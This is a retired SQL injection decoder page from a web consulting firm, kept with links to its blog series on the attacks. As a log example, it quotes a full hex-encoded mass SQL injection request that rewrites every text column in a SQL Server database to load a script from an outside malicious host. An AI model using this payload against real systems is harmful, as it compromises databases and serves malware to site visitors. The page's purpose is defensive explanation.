consulting | development | marketing

SQL injection attack/attempt test page

If you reached this page, you have tried the SQL injection attack attempt without passing the malicious SQL statement as query parameter.

May 17th 2015: After almost 7 years, and hundreds of thousands of test submissions, we have decided to retire this tool.

Attack methods have changed, new tools have emerged, and with the popularity of WordPress and other CMS frameworks, other hacks have become more common and their implications have become more devastating for the website owners.
Therefore we have moved on to helping users clean up their infected websites quickly and efficiently.
If you have been hacked, penalized by Google or have any other website issues, please contact us!

Thanks to everyone who found this tool helpful!

Translate your code below

It seems like a lot of people are lost when it comes to translating/decoding the hexadecimal value of the SQL statement.
Copy and paste the whole request from your logfile - the request might look like this:

/yourfilename.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661
726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F
437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D
207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335
206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437
572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4
043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465
205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372
633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970
743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737
273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626
C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C
4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);


in the field below and we will try to decode it for you (we did our best but it might or might not work for everyone, especially since the statements are likely to change):

Related blog postings

SQL injection attempts: no end in sight?

SQL injection attack attemps: Part 2: Answers

SQL injection attacks: Part 3: Securing your forms and preventing SQL injection attempts (PHP/MySQL)

SQL injection attacks: Part 4: What the JavaScript does

1-877-NINANET
(1-877-646-2638)